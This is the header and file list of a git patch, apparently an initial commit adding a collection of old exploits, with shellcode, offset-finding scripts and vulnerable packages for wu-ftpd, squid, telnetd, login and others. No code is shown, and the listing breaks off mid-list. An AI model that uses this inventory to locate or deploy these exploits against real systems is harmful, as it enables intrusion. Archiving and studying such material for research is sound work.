From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 
From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- exploits/7350854/7350854 | Bin 0 -> 18649 bytes exploits/7350854/7350854-r | Bin 0 -> 18712 bytes exploits/7350854/7350854-r.c | 944 +++++ exploits/7350854/7350854.c | 877 +++++ exploits/7350854/7350854.id0 | Bin 0 -> 196608 bytes exploits/7350854/7350854.id1 | Bin 0 -> 73728 bytes exploits/7350854/7350854.nam | Bin 0 -> 16384 bytes exploits/7350854/7350854.til | Bin 0 -> 64 bytes exploits/7350854/teso-advisory-011.tar.gz | Bin 0 -> 2510 bytes exploits/7350854/teso-advisory-011.txt | 307 ++ .../teso-advisory-011/teso-advisory-011.txt | 153 + exploits/7350854/teso-howitmaybeworkonsparc.txt | 59 + exploits/7350855-netkit/netkit-telnet-0.16/BUGS | 24 + .../7350855-netkit/netkit-telnet-0.16/ChangeLog | 152 + exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG | 20 + .../7350855-netkit/netkit-telnet-0.16/MCONFIG.in | 30 + exploits/7350855-netkit/netkit-telnet-0.16/MRULES | 8 + .../7350855-netkit/netkit-telnet-0.16/Makefile | 20 + exploits/7350855-netkit/netkit-telnet-0.16/README | 102 + .../7350855-netkit/netkit-telnet-0.16/configure | 571 +++ .../netkit-telnet-0.16/debian/changelog | 139 + .../netkit-telnet-0.16/debian/control | 21 + .../netkit-telnet-0.16/debian/copyright | 18 + .../7350855-netkit/netkit-telnet-0.16/debian/dirs | 2 + .../7350855-netkit/netkit-telnet-0.16/debian/docs | 2 + .../netkit-telnet-0.16/debian/login.c | 23 + .../7350855-netkit/netkit-telnet-0.16/debian/rules | 77 + .../netkit-telnet-0.16/debian/telnetd.dirs | 4 + .../netkit-telnet-0.16/debian/telnetd.postinst | 45 + .../netkit-telnet-0.16/debian/telnetd.postrm | 29 + .../netkit-telnet-0.16/debian/telnetd.prerm | 9 + .../netkit-telnet-0.16/pty-hang.patch | 99 + .../netkit-telnet-0.16/telnet/Makefile | 30 + .../telnet/NetKit-B-0.06-telnet.patch | 27 + .../netkit-telnet-0.16/telnet/README | 26 + .../netkit-telnet-0.16/telnet/README.old | 566 +++ .../7350855-netkit/netkit-telnet-0.16/telnet/TODO | 13 + 
.../netkit-telnet-0.16/telnet/array.h | 97 + .../netkit-telnet-0.16/telnet/authenc.cc | 114 + .../netkit-telnet-0.16/telnet/commands.cc | 2233 +++++++++++ .../netkit-telnet-0.16/telnet/commands.o | Bin 0 -> 44868 bytes .../netkit-telnet-0.16/telnet/defines.h | 52 + .../netkit-telnet-0.16/telnet/depend.mk | 17 + .../netkit-telnet-0.16/telnet/environ.cc | 200 + .../netkit-telnet-0.16/telnet/environ.h | 10 + .../netkit-telnet-0.16/telnet/environ.o | Bin 0 -> 6120 bytes .../netkit-telnet-0.16/telnet/externs.h | 365 ++ .../netkit-telnet-0.16/telnet/fdset.h | 50 + .../netkit-telnet-0.16/telnet/general.h | 46 + .../netkit-telnet-0.16/telnet/genget.cc | 91 + .../netkit-telnet-0.16/telnet/genget.h | 5 + .../netkit-telnet-0.16/telnet/genget.o | Bin 0 -> 1324 bytes .../netkit-telnet-0.16/telnet/main.cc | 257 ++ .../netkit-telnet-0.16/telnet/main.o | Bin 0 -> 4460 bytes .../netkit-telnet-0.16/telnet/netlink.cc | 199 + .../netkit-telnet-0.16/telnet/netlink.h | 26 + .../netkit-telnet-0.16/telnet/netlink.o | Bin 0 -> 7068 bytes .../netkit-telnet-0.16/telnet/network.cc | 91 + .../netkit-telnet-0.16/telnet/network.o | Bin 0 -> 1744 bytes .../netkit-telnet-0.16/telnet/proto.h | 41 + .../netkit-telnet-0.16/telnet/ptrarray.h | 92 + .../netkit-telnet-0.16/telnet/ring.cc | 209 ++ .../netkit-telnet-0.16/telnet/ring.h | 111 + .../netkit-telnet-0.16/telnet/ring.o | Bin 0 -> 4984 bytes .../netkit-telnet-0.16/telnet/sys_bsd.cc | 406 ++ .../netkit-telnet-0.16/telnet/sys_bsd.o | Bin 0 -> 4284 bytes .../netkit-telnet-0.16/telnet/telnet | Bin 0 -> 123042 bytes .../netkit-telnet-0.16/telnet/telnet.1 | 1263 +++++++ .../netkit-telnet-0.16/telnet/telnet.cc | 2069 +++++++++++ .../netkit-telnet-0.16/telnet/telnet.o | Bin 0 -> 27488 bytes .../netkit-telnet-0.16/telnet/terminal.cc | 718 ++++ .../netkit-telnet-0.16/telnet/terminal.h | 11 + .../netkit-telnet-0.16/telnet/terminal.o | Bin 0 -> 9248 bytes .../netkit-telnet-0.16/telnet/tn3270.cc | 366 ++ .../netkit-telnet-0.16/telnet/tn3270.o | Bin 0 -> 829 
bytes .../netkit-telnet-0.16/telnet/types.h | 52 + .../netkit-telnet-0.16/telnet/utilities.cc | 673 ++++ .../netkit-telnet-0.16/telnet/utilities.o | Bin 0 -> 13444 bytes .../netkit-telnet-0.16/telnetd/Makefile | 38 + .../netkit-telnet-0.16/telnetd/authenc.c | 83 + .../netkit-telnet-0.16/telnetd/defs.h | 215 ++ .../netkit-telnet-0.16/telnetd/ext.h | 212 ++ .../netkit-telnet-0.16/telnetd/getent.c | 71 + .../netkit-telnet-0.16/telnetd/global.c | 98 + .../netkit-telnet-0.16/telnetd/issue.net.5 | 43 + .../netkit-telnet-0.16/telnetd/login.3 | 107 + .../netkit-telnet-0.16/telnetd/logout.h | 1 + .../netkit-telnet-0.16/telnetd/logwtmp.h | 5 + .../netkit-telnet-0.16/telnetd/pathnames.h | 41 + .../netkit-telnet-0.16/telnetd/setproctitle.3 | 73 + .../netkit-telnet-0.16/telnetd/setproctitle.c | 145 + .../netkit-telnet-0.16/telnetd/setproctitle.h | 4 + .../netkit-telnet-0.16/telnetd/slc.c | 456 +++ .../netkit-telnet-0.16/telnetd/state.c | 1408 +++++++ .../netkit-telnet-0.16/telnetd/sys_term.c | 744 ++++ .../7350855-netkit/netkit-telnet-0.16/telnetd/t.c | 2 + .../netkit-telnet-0.16/telnetd/telnetd.8 | 486 +++ .../netkit-telnet-0.16/telnetd/telnetd.c | 1163 ++++++ .../netkit-telnet-0.16/telnetd/telnetd.h | 50 + .../netkit-telnet-0.16/telnetd/termstat.c | 588 +++ .../netkit-telnet-0.16/telnetd/utility.c | 1145 ++++++ .../7350855-netkit/netkit-telnet-0.16/version.h | 5 + exploits/7350855-netkit/netkit-telnet-0.17/BUGS | 24 + .../7350855-netkit/netkit-telnet-0.17/ChangeLog | 170 + .../7350855-netkit/netkit-telnet-0.17/MCONFIG.in | 30 + exploits/7350855-netkit/netkit-telnet-0.17/MRULES | 8 + .../7350855-netkit/netkit-telnet-0.17/Makefile | 20 + exploits/7350855-netkit/netkit-telnet-0.17/README | 127 + .../7350855-netkit/netkit-telnet-0.17/configure | 572 +++ .../netkit-telnet-0.17/debian/changelog | 244 ++ .../netkit-telnet-0.17/debian/control | 25 + .../netkit-telnet-0.17/debian/copyright | 18 + .../7350855-netkit/netkit-telnet-0.17/debian/dirs | 3 + 
.../7350855-netkit/netkit-telnet-0.17/debian/docs | 2 + .../7350855-netkit/netkit-telnet-0.17/debian/menu | 3 + .../netkit-telnet-0.17/debian/postinst | 8 + .../7350855-netkit/netkit-telnet-0.17/debian/prerm | 7 + .../7350855-netkit/netkit-telnet-0.17/debian/rules | 85 + .../netkit-telnet-0.17/debian/telnetd.dirs | 4 + .../netkit-telnet-0.17/debian/telnetd.docs | 2 + .../netkit-telnet-0.17/debian/telnetd.postinst | 57 + .../netkit-telnet-0.17/debian/telnetd.postrm | 25 + .../netkit-telnet-0.17/debian/telnetd.prerm | 6 + .../netkit-telnet-0.17/pty-hang.patch | 99 + .../netkit-telnet-0.17/telnet/Makefile | 30 + .../netkit-telnet-0.17/telnet/README | 26 + .../netkit-telnet-0.17/telnet/README.old | 566 +++ .../7350855-netkit/netkit-telnet-0.17/telnet/TODO | 13 + .../netkit-telnet-0.17/telnet/array.h | 97 + .../netkit-telnet-0.17/telnet/authenc.cc | 116 + .../netkit-telnet-0.17/telnet/commands.cc | 2262 ++++++++++++ .../netkit-telnet-0.17/telnet/defines.h | 52 + .../netkit-telnet-0.17/telnet/depend.mk | 17 + .../netkit-telnet-0.17/telnet/environ.cc | 201 + .../netkit-telnet-0.17/telnet/environ.h | 10 + .../netkit-telnet-0.17/telnet/externs.h | 365 ++ .../netkit-telnet-0.17/telnet/fdset.h | 50 + .../netkit-telnet-0.17/telnet/general.h | 46 + .../netkit-telnet-0.17/telnet/genget.cc | 91 + .../netkit-telnet-0.17/telnet/genget.h | 5 + .../netkit-telnet-0.17/telnet/main.cc | 275 ++ .../netkit-telnet-0.17/telnet/netlink.cc | 177 + .../netkit-telnet-0.17/telnet/netlink.h | 25 + .../netkit-telnet-0.17/telnet/network.cc | 92 + .../netkit-telnet-0.17/telnet/proto.h | 41 + .../netkit-telnet-0.17/telnet/ptrarray.h | 92 + .../netkit-telnet-0.17/telnet/ring.cc | 213 ++ .../netkit-telnet-0.17/telnet/ring.h | 111 + .../netkit-telnet-0.17/telnet/sys_bsd.cc | 413 +++ .../netkit-telnet-0.17/telnet/telnet.1 | 1267 +++++++ .../netkit-telnet-0.17/telnet/telnet.cc | 2071 +++++++++++ .../netkit-telnet-0.17/telnet/terminal.cc | 720 ++++ .../netkit-telnet-0.17/telnet/terminal.h | 11 + 
.../netkit-telnet-0.17/telnet/tn3270.cc | 366 ++ .../netkit-telnet-0.17/telnet/types.h | 52 + .../netkit-telnet-0.17/telnet/utilities.cc | 675 ++++ .../netkit-telnet-0.17/telnetd/Makefile | 38 + .../netkit-telnet-0.17/telnetd/authenc.c | 71 + .../netkit-telnet-0.17/telnetd/defs.h | 216 ++ .../netkit-telnet-0.17/telnetd/ext.h | 214 ++ .../netkit-telnet-0.17/telnetd/getent.c | 71 + .../netkit-telnet-0.17/telnetd/global.c | 97 + .../netkit-telnet-0.17/telnetd/issue.net.5 | 43 + .../netkit-telnet-0.17/telnetd/login.3 | 107 + .../netkit-telnet-0.17/telnetd/logout.h | 1 + .../netkit-telnet-0.17/telnetd/logwtmp.h | 5 + .../netkit-telnet-0.17/telnetd/pathnames.h | 41 + .../netkit-telnet-0.17/telnetd/setproctitle.3 | 73 + .../netkit-telnet-0.17/telnetd/setproctitle.c | 145 + .../netkit-telnet-0.17/telnetd/setproctitle.h | 4 + .../netkit-telnet-0.17/telnetd/slc.c | 456 +++ .../netkit-telnet-0.17/telnetd/state.c | 1407 +++++++ .../netkit-telnet-0.17/telnetd/sys_term.c | 744 ++++ .../netkit-telnet-0.17/telnetd/telnetd.8 | 486 +++ .../netkit-telnet-0.17/telnetd/telnetd.c | 1208 ++++++ .../netkit-telnet-0.17/telnetd/telnetd.h | 50 + .../netkit-telnet-0.17/telnetd/termstat.c | 588 +++ .../netkit-telnet-0.17/telnetd/utility.c | 1266 +++++++ .../netkit-telnet-0.17/telnetlogin/Makefile | 18 + .../netkit-telnet-0.17/telnetlogin/telnetlogin.8 | 91 + .../netkit-telnet-0.17/telnetlogin/telnetlogin.c | 230 ++ .../7350855-netkit/netkit-telnet-0.17/version.h | 5 + .../netkit-telnet_0.16-4potato.1.diff.gz | Bin 0 -> 8327 bytes .../netkit-telnet_0.16-4potato.1.dsc | 23 + .../7350855-netkit/netkit-telnet_0.16.orig.tar.gz | Bin 0 -> 130043 bytes .../7350855-netkit/netkit-telnet_0.17-14.diff.gz | Bin 0 -> 20569 bytes exploits/7350855-netkit/netkit-telnet_0.17-14.dsc | 24 + .../7350855-netkit/netkit-telnet_0.17.orig.tar.gz | Bin 0 -> 133749 bytes exploits/7350855-netkit/telnetd-0.16.tgz | Bin 0 -> 26640 bytes .../usr/lib/telnetd/login | Bin 0 -> 2988 bytes 
.../usr/share/doc/telnetd/changelog.Debian.gz | Bin 0 -> 1477 bytes .../usr/share/doc/telnetd/changelog.gz | Bin 0 -> 2550 bytes .../usr/share/doc/telnetd/copyright | 18 + .../usr/share/man/man5/issue.net.5.gz | Bin 0 -> 676 bytes .../usr/share/man/man8/in.telnetd.8.gz | Bin 0 -> 4700 bytes .../usr/share/man/man8/telnetd.8.gz | 1 + exploits/7350855-netkit/telnetd_0.16-4potato.1.deb | Bin 0 -> 29366 bytes exploits/7350855-netkit/telnetd_0.17-13_i386.deb | Bin 0 -> 37522 bytes exploits/7350855/0/7350somefoo.c | 292 ++ exploits/7350855/0/Makefile | 20 + exploits/7350855/0/README | 18 + exploits/7350855/0/common.c | 318 ++ exploits/7350855/0/common.h | 26 + exploits/7350855/0/network.c | 918 +++++ exploits/7350855/0/network.h | 367 ++ exploits/7350855/0/packet.c | 487 +++ exploits/7350855/0/packet.h | 85 + exploits/7350855/0/readtest.c | 42 + exploits/7350855/0/sniff.c | 323 ++ exploits/7350855/0/sniff.h | 44 + exploits/7350855/7350855 | Bin 0 -> 189293 bytes exploits/7350855/7350855-bumped.tar.gz | Bin 0 -> 23571 bytes exploits/7350855/7350855.c | 293 ++ exploits/7350855/7350855_exploit.c | 877 +++++ exploits/7350855/Makefile | 20 + exploits/7350855/common.c | 318 ++ exploits/7350855/common.h | 26 + exploits/7350855/common.o | Bin 0 -> 21684 bytes exploits/7350855/network.c | 918 +++++ exploits/7350855/network.h | 367 ++ exploits/7350855/network.o | Bin 0 -> 46048 bytes exploits/7350855/none.tgz | Bin 0 -> 18002 bytes exploits/7350855/packet.c | 487 +++ exploits/7350855/packet.h | 85 + exploits/7350855/packet.o | Bin 0 -> 44540 bytes exploits/7350855/readtest | Bin 0 -> 63363 bytes exploits/7350855/readtest.c | 42 + exploits/7350855/sniff.c | 323 ++ exploits/7350855/sniff.h | 44 + exploits/7350855/sniff.o | Bin 0 -> 41984 bytes exploits/7350aio/7350aio.c | 117 + exploits/7350bdf/7350bdf.c | 201 + exploits/7350hprlpd/7350hprlpd | Bin 0 -> 30064 bytes exploits/7350hprlpd/7350hprlpd.c | 345 ++ exploits/7350hpuke/7350hpuke | Bin 0 -> 24899 bytes 
exploits/7350hpuke/7350hpuke.c | 1270 +++++++ exploits/7350hpuke/backup/7350hpuke-0.2.0.c | 840 +++++ exploits/7350hpuke/backup/7350hpuke-0.2.1.c | 894 +++++ exploits/7350hpuke/backup/7350hpuke-0.4.0.c | 1214 ++++++ exploits/7350hpuke/proof/proof.txt | 2 + exploits/7350hpuke/proof/proof_hpux_ftpd.txt | 99 + exploits/7350logout/7350logout | Bin 0 -> 20426 bytes exploits/7350logout/7350logout-0.2.1.c | 954 +++++ exploits/7350logout/7350logout.c | 1189 ++++++ exploits/7350logout/irix-6.5-login.c | 3867 ++++++++++++++++++++ exploits/7350logout/login-27-x86 | Bin 0 -> 27996 bytes exploits/7350logout/login-ex.c-20020318-morgan | 533 +++ exploits/7350logout/loginex.c | 302 ++ exploits/7350logout/pam.txt | 103 + exploits/7350logout/solaris-2.4-sparc-login | Bin 0 -> 27260 bytes exploits/7350logout/solaris-2.6-sparc-login | Bin 0 -> 29444 bytes exploits/7350logout/solaris-2.6-sparc-login2 | Bin 0 -> 29512 bytes exploits/7350logout/solaris-2.7-login.c | 2355 ++++++++++++ exploits/7350logout/solaris-2.8-sparc-login | Bin 0 -> 29292 bytes .../7350logout/solaris-2.8-sparc-login-patched | Bin 0 -> 29200 bytes exploits/7350logout/solaris-2.8-sparc-login.o | Bin 0 -> 38604 bytes exploits/7350php/7350php | Bin 0 -> 21909 bytes exploits/7350php/7350php.c | 376 ++ exploits/7350php/Makefile | 17 + exploits/7350php/common.c | 318 ++ exploits/7350php/common.h | 26 + exploits/7350php/common.o | Bin 0 -> 2692 bytes exploits/7350php/network.c | 918 +++++ exploits/7350php/network.h | 367 ++ exploits/7350php/network.o | Bin 0 -> 8936 bytes exploits/7350rsync/7350rsync.c | 1256 +++++++ exploits/7350squish/7350squish | Bin 0 -> 12419 bytes exploits/7350squish/7350squish-0.1.tar.gz | Bin 0 -> 7345 bytes exploits/7350squish/7350squish.c | 642 ++++ exploits/7350squish/7350squish.txt | 94 + exploits/7350squish/deb/squid_2.3.4-2_i386.deb | Bin 0 -> 666056 bytes exploits/7350squish/deb/squid_2.4.1-1_i386.deb | Bin 0 -> 671672 bytes exploits/7350squish/deb/squid_2.4.1-2_i386.deb | Bin 0 -> 671734 
bytes exploits/7350squish/deb/squid_2.4.1-3_i386.deb | Bin 0 -> 671786 bytes exploits/7350squish/deb/squid_2.4.1-4_i386.deb | Bin 0 -> 672908 bytes exploits/7350squish/deb/squid_2.4.1-5_i386.deb | Bin 0 -> 672822 bytes exploits/7350squish/deb/squid_2.4.2-1_i386.deb | Bin 0 -> 675904 bytes exploits/7350squish/offset-find.sh | 67 + exploits/7350squish/tagspace.c | 42 + exploits/7350squish/udp.c | 232 ++ exploits/7350wurm/7350wurm | Bin 0 -> 27684 bytes exploits/7350wurm/7350wurm-backup2.c | 1173 ++++++ exploits/7350wurm/7350wurm-backup3.c | 1235 +++++++ exploits/7350wurm/7350wurm-backup4.c | 1217 ++++++ exploits/7350wurm/7350wurm.c | 1428 ++++++++ exploits/7350wurm/backup/7350wurm-backup2.c | 1034 ++++++ exploits/7350wurm/backup/7350wurm-old.c | 925 +++++ exploits/7350wurm/doc/for-scut.txt | 48 + exploits/7350wurm/doc/free.txt | 77 + exploits/7350wurm/doc/syn.txt | 73 + exploits/7350wurm/doc/synnergy-method.txt | 16 + exploits/7350wurm/offset-find.sh | 57 + exploits/7350wurm/openbsd-ftpd-linux.txt | 7 + .../redhat50update_wu-ftpd-2.4.2b18-2.1.i386.rpm | Bin 0 -> 119573 bytes .../redhat51update_wu-ftpd-2.4.2b18-2.1.i386.rpm | Bin 0 -> 119573 bytes .../rpm/done/redhat52_wu-ftpd-2.4.2b18-2.i386.rpm | Bin 0 -> 120648 bytes .../redhat52update_wu-ftpd-2.6.0-2.5.x.i386.rpm | Bin 0 -> 173351 bytes .../redhat60update_wu-ftpd-2.6.0-14.6x.i386.rpm | Bin 0 -> 195637 bytes .../redhat61update_wu-ftpd-2.6.0-14.6x.i386.rpm | Bin 0 -> 195637 bytes .../rpm/done/redhat62_wu-ftpd-2.6.0-3.i386.rpm | Bin 0 -> 189643 bytes .../redhat62update_wu-ftpd-2.6.0-14.6x.i386.rpm | Bin 0 -> 195637 bytes .../rpm/done/redhat70_wu-ftpd-2.6.1-6.i386.rpm | Bin 0 -> 196336 bytes .../rpm/done/redhat71_wu-ftpd-2.6.1-16.i386.rpm | Bin 0 -> 220928 bytes .../rpm/done/redhat72_wu-ftpd-2.6.1-18.i386.rpm | Bin 0 -> 219324 bytes .../done/suse6061update_wuftpd-2.6.0-151.i386.rpm | Bin 0 -> 332291 bytes .../done/suse62update_wuftpd-2.6.0-121.i386.rpm | Bin 0 -> 339308 bytes 
.../7350wurm/rpm/done/suse70default_wuftpd.rpm | Bin 0 -> 332428 bytes .../7350wurm/rpm/done/suse71default_wuftpd.rpm | Bin 0 -> 329378 bytes .../7350wurm/rpm/done/suse72default_wuftpd.rpm | Bin 0 -> 334720 bytes .../7350wurm/rpm/done/suse73default_wuftpd.rpm | Bin 0 -> 333844 bytes exploits/7350wurm/rpm/failed/suse-53.de-wuftpd.rpm | Bin 0 -> 80547 bytes .../immunix62_wu-ftpd-2.6.0-3_StackGuard.i386.rpm | Bin 0 -> 195809 bytes .../redhat62update_wu-ftpd-2.6.1-0.6x.21.i386.rpm | Bin 0 -> 216611 bytes .../redhat70update_wu-ftpd-2.6.1-16.7x.1.i386.rpm | Bin 0 -> 220217 bytes .../redhat71update_wu-ftpd-2.6.1-16.7x.1.i386.rpm | Bin 0 -> 220217 bytes .../redhat72update_wu-ftpd-2.6.1-20.i386.rpm | Bin 0 -> 219510 bytes .../patched/suse63update_wuftpd-2.6.0-347.i386.rpm | Bin 0 -> 341014 bytes .../patched/suse64update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 336858 bytes .../patched/suse70update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 333415 bytes .../patched/suse71update_wuftpd-2.6.0-346.i386.rpm | Bin 0 -> 330753 bytes .../patched/suse72update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 335916 bytes .../patched/suse73update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 343373 bytes .../rpm/redhat60_wu-ftpd-2.4.2vr17-3.i386.rpm | Bin 0 -> 160584 bytes .../7350wurm/rpm/redhat61_wu-ftpd-2.5.0-9.i386.rpm | Bin 0 -> 172156 bytes exploits/7350wurm/rpm/wu-ftpd-2.6.0.tgz | Bin 0 -> 185897 bytes exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpaccess | 24 + .../7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpconversions | 7 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpgroups | 1 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftphosts | 5 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpusers | 14 + .../rpm/wu-ftpd-2.6.0/etc/logrotate.d/ftpd | 4 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/pam.d/ftp | 6 + .../7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpcount | Bin 0 -> 10188 bytes exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpwho | Bin 0 -> 10188 bytes .../wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CHANGES | 2865 +++++++++++++++ 
.../usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS | 344 ++ .../rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/ERRATA | 68 + .../doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT | 722 ++++ .../wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO | 463 +++ .../rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/README | 76 + .../rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/TODO | 105 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpaccess | 19 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy | 59 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpconversions | 9 + .../wu-ftpd-2.6.0/examples/ftpconversions.solaris | 2 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpgroups | 1 + .../usr/doc/wu-ftpd-2.6.0/examples/ftphosts | 7 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpservers | 25 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpusers | 14 + .../rpm/wu-ftpd-2.6.0/usr/man/man1/ftpcount.1.gz | Bin 0 -> 701 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man1/ftpwho.1.gz | Bin 0 -> 702 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/ftpaccess.5.gz | Bin 0 -> 13641 bytes .../wu-ftpd-2.6.0/usr/man/man5/ftpconversions.5.gz | Bin 0 -> 857 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/ftphosts.5.gz | Bin 0 -> 815 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/ftpservers.5.gz | Bin 0 -> 1635 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/xferlog.5.gz | Bin 0 -> 1490 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/ftpd.8.gz | Bin 0 -> 5272 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/ftprestart.8.gz | Bin 0 -> 846 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/ftpshut.8.gz | Bin 0 -> 1583 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/privatepw.8.gz | Bin 0 -> 1350 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ckconfig | Bin 0 -> 8912 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftprestart | Bin 0 -> 9296 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftpshut | Bin 0 -> 12048 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.ftpd | Bin 0 -> 166352 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.wuftpd | 1 + .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/privatepw | Bin 0 -> 11888 bytes 
.../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/wu.ftpd | 1 + .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/xferstats | 338 ++ exploits/7350wurm/shellcode/bambam.s | 230 ++ exploits/7350wurm/shellcode/codedump | Bin 0 -> 6555 bytes exploits/7350wurm/shellcode/codedump.c | 93 + exploits/7350wurm/shellcode/pt/Makefile | 8 + exploits/7350wurm/shellcode/pt/README | 6 + exploits/7350wurm/shellcode/pt/rptrace.c | 42 + exploits/7350wurm/shellcode/pt/rptrace.o | Bin 0 -> 1456 bytes exploits/7350wurm/shellcode/pt/x.tar.gz | Bin 0 -> 800 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit | Bin 0 -> 7622 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit.c | 192 + exploits/7350wurm/shellcode/t | Bin 0 -> 4994 bytes exploits/7350wurm/shellcode/t.c | 12 + exploits/7350wurm/shellcode/write-read-exec.s | 38 + exploits/7350wurm/timoglaser.txt | 3 + exploits/ftpd_exp/README | 5 + exploits/ftpd_exp/exp.c | 25 + exploits/ftpd_exp/exp.py | 26 + exploits/ifafoffuffoffaf.c | 1391 +++++++ 386 files changed, 81193 insertions(+) create mode 100644 exploits/7350854/7350854 create mode 100644 exploits/7350854/7350854-r create mode 100644 exploits/7350854/7350854-r.c create mode 100644 exploits/7350854/7350854.c create mode 100644 exploits/7350854/7350854.id0 create mode 100644 exploits/7350854/7350854.id1 create mode 100644 exploits/7350854/7350854.nam create mode 100644 exploits/7350854/7350854.til create mode 100644 exploits/7350854/teso-advisory-011.tar.gz create mode 100644 exploits/7350854/teso-advisory-011.txt create mode 100644 exploits/7350854/teso-advisory-011/teso-advisory-011.txt create mode 100644 exploits/7350854/teso-howitmaybeworkonsparc.txt create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/BUGS create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in create mode 100644 
exploits/7350855-netkit/netkit-telnet-0.16/MRULES create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/configure create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/control create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/docs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/rules create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/authenc.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.o create mode 100644 
exploits/7350855-netkit/netkit-telnet-0.16/telnet/defines.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/depend.mk create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/environ.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/environ.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/environ.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/externs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/fdset.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/general.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/genget.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/genget.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/genget.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/main.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/main.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/netlink.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/netlink.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/netlink.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/network.cc create mode 100644 